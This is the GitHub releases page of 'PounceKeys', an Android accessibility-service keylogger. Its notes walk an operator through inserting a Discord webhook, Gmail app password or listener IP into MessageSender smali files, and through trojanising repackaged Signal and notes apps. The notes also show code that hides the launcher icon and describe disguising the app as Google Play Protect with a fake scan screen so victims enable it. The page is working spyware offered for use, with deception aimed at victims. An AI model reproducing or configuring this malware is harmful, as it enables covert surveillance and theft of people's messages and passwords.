Skip to content

Releases: NullPounce/pounce-keys

Pounce-Keys-Signal

17 Feb 20:56
4ba0f8a
Compare
Choose a tag to compare

I decompiled it for your as it takes a while, so just make the 2 line edits in the 1 file and build with the apktool gui

------------NEW BUFFER IS 500!------------

Use: Signal-Android-play-prod-universal-debug-6.47.3.apk

decompile with github.com/AndnixSH/APKToolGUI (it's over 20 DEX files give it time) open in IDE and search and replace for

"INSERT-WEBHOOK-URL-FROM-YOUR-CHANNEL-BOT"

or

"paste in your webhook"

then compile with the same program. (it's inside of MessageSender.smali

if your a notepad kinda person or just want it simple: edit this file in the decompiled source

Signal-Android-play-prod-universal-debug-6.47.3\smali_classes16\com\google\android\MessageSender.smali

Source: https://github.com/NullPounce/Signal-Android

Screenshot 2024-02-17 161210

PounceKeys-Notes

15 Feb 12:41
9db5d88
Compare
Choose a tag to compare

notes app forked from github.com/OmGodse/Notally

use github.com/AndnixSH/APKToolGUI

This release uses Discord

Download Decompiled.rar and extract the decompiled apk folder
next use your IDE "Visual Studio" and search in all project files for a search and replace all for "INSERT-YOUR-DISCORD-WEBHOOK-HERE"

this file can be found here:
FileManager\FileManager\smali_classes13\com\omgodse\notally\MessageSender.smali

it's in their to replace two times, line 21 and 81

PounceKey's Builder's [Discord] [Gmail] [IP]

15 Nov 22:55
73adb52
Compare
Choose a tag to compare

March 16th 2024 PounceKeysBuilder_2.0.rar

This new Builder has been made with Python Eel "it's like electron but for python"

You will need a chrome based browser and JDK19 (Windows)
https://www.oracle.com/java/technologies/javase/jdk19-archive-downloads.html

this release includes the new play protect Gif as the GUI.
<------------>
[OLD]
Discord Buffer = 200 "200 key events/presses"
IP Buffer = 75
Gmail Buffer = 200 "so every 200 typed keys, going to 300 broke it.... maybe low memory/LogCat"

you must have python and java installed.
Example: To run: "PounceKeys-Discord.py"

in powershell do:
python -m PounceKeys-Discord

for Linux use: "PounceKeys-Discord_Linux.py"

above are examples, download the one you want, ip,gmail,discord and use its respective python file for building.

do not have spaces in your path when building.
ip version uses port 4444

00039-927040860-cat_themed_crt_monitor_in_the_style_invader_zim-removebg-preview_32x32

Pounce-Keys-Gmail

12 Mar 22:57
4a42db7
Compare
Choose a tag to compare

March 16th 2024 3.0

Multi Device support "appends/adds the device model/manufacturer to every log message"

New GUI replicating a google play protect scan and a 3rd alert to enable the service that's a pop up.

<------------>
old

hidden icon up to android 13 instead of only 9

notifications are logged and sent again

system info sent on service enable

"should" now alert user to enable the service

updated the icon and text "general cleanup"


buffer is 200, apk's ending in 999 have a buffer of 999

App icon is now stealth "hidden from home and launcher screen" up to Android 13 instead of only version 9. (12.1 not vuln)

  • tested and working Android 5-13 (version 12.0 keylogs but 12.1 does not, 12.1 can get a sys info email, 14 untested.)

Now sends "logs" notifications again, it is tied in sync into the typing buffer.

Now sends system info on service enable. (soon as the accessibility service is enabled the email is sent "avoiding testing")

A drop down notification and a toast message will now alert the user to enable the service

  • using the stealth version disables this (may not work on all phones "let me know in Discord")

Updated the icon to replicate Google Play Protect and changed names from BatteryHealthService to GooglePlayProtectService

  • moved the java files up a folder from the BatteryHealth folder "deleted" up to the com folder making the top entry "package com;"

Opening the app just brings up the settings (or says app not installed and won't open)


1.0

this was a huge pain and learning curve, had to deal with an api bug but its fixed
works in 2023 using app password method thanks to @ 2picodin9 for the suggestion

this has a buffer of 200 to avoid spam
open APK Editor and open the apk or messagesender.java if in android studio

In AS it will show as follows:

private static final String USERNAME = "Your-Email@gmail.com";
private static final String APP_PASSWORD = "APP-PASSWORD";
private static final String RECIPIENT_EMAIL = "Your-Email@gmail.com";
private static final int MAX_BUFFER_SIZE = 200;

replace "APP-PASSWORD" with the 16 character long app password from your 2FA enabled google account

then replace "Your-Email@gmail.com" with your email in the username and recip lines

In APK Editor do a search and replace for:

APP-PASSWORD
Your-Email@gmail.com

with your info and then just save it, a search and replace as its everywhere in apk edit

Pounce-Keys-Discord

12 Mar 22:38
4a42db7
Compare
Choose a tag to compare

March 16th 2024 3.0

Multi Device support "appends/adds the device model/manufacturer to every log message"

New GUI replicating a google play protect scan and a 3rd alert to enable the service that's a pop up.

<------------>
old

hidden icon up to android 13 instead of only 9

notifications are logged and sent again

system info sent on service enable

"should" now alert user to enable the service

updated the icon and text "general cleanup"

buffer is 999

no need to open any ports, use your own discord channel as a listener

open APK Editor or Android Studio and open the MessageSender.smali or Java file

-located in:
smali_classes3\com\BatteryHealth\MessageSender.smali

we need to replace:
"INSERT-WEBHOOK-URL-FROM-YOUR-CHANNEL-BOT"

or

"paste in your webhook"

TWO different times (yes paste in your bot url twice over whats inside)

you can just search for "INSERT-WEBHOOK-URL-FROM-YOUR-CHANNEL-BOT"

and find two instances of it and paste in your bot url over it in the two sections in this one file

if inside AS you only need to change it once you'll see

click the gear icon on your channel and click edit channel then integrations to create a webhook bot then copy its url and your all set.

PounceKeys-IP

06 Mar 04:16
e9f8796
Compare
Choose a tag to compare

march 16th 2024 new update

default port is 4444 no need to set. the numbers in the names are in relation to the buffer size

added this snippet to end of mainactivity.java

// Hide the launcher icon
		PackageManager p = getPackageManager();
		ComponentName componentName = new ComponentName(this, MainActivity.class);
		p.setComponentEnabledSetting(componentName, PackageManager.COMPONENT_ENABLED_STATE_DISABLED, PackageManager.DONT_KILL_APP);
	}
}

and then updated the manifest like so

<application
		android:allowBackup="true"
		android:icon="@android:color/transparent"
		android:label="@string/app_name"

		android:supportsRtl="true"
		android:theme="@style/AppTheme">
		<activity android:name=".MainActivity"
			android:exported="false">

this gives us our old behavior which makes it not open the app at all on all android versions and hides from the
launcher android 9 and bellow.

Pounce Keys 2.0 APK "project ip hardcode"

03 Mar 07:18
38f87f2
Compare
Choose a tag to compare

Pounce keys 2.0 release notes

this version
hard codes the ip

use APK Editor Studio to open the apk and search for 192.168.0.135 and replace with your ip in the 2 smali files
mainactivity and messagesender then save the apk and install and use the listener.

keylogger apk's and java listener in jar, exe

21 Jan 11:18
db02e24
Compare
Choose a tag to compare

hidden and normal apk
made a custom listener in java, source files in project, (if you want to look at the java code, make edits or compile yourself
for windows extract the whole folder and just run the exe

open a terminal and type
java -jar MessageListener.jar for the java version of the listener
only in rar files as the icon or config file is separate at the moment
jar version should work in windows and linux
jdk 19